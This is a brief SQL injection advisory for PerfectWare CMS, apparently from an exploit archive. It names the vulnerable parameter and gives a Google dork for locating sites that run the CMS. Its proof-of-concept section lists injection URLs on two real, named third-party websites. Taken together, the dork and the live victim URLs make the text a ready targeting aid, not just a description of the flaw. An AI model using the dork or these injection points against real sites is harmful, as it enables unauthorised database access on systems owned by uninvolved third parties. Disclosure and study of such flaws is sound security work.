PerfectWare CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
afc520a7ed4795f43b84316ac3c45eaf4047d3b31843ca491b7153cd9e8823a6
# PerfectWare CMS SQL Injection
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 09/05/2014
# Vendor Homepage: http://www.perfectware.com.br/ (Robson Gutierrez)
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intext:Desenvolvimento By Robson Gutierrez
# Url vul : http://host/?parameter1=ID_1¶meter2=[SQLI]
# Exploit:
Post exploit = ¶meter2=[SQLI]
# PoC : http://renovaautocenter.com.br/?conteudo=servicos&menu=geometria'
http://decoracaohortifruti.com.br/?conteudo=videos&id=59'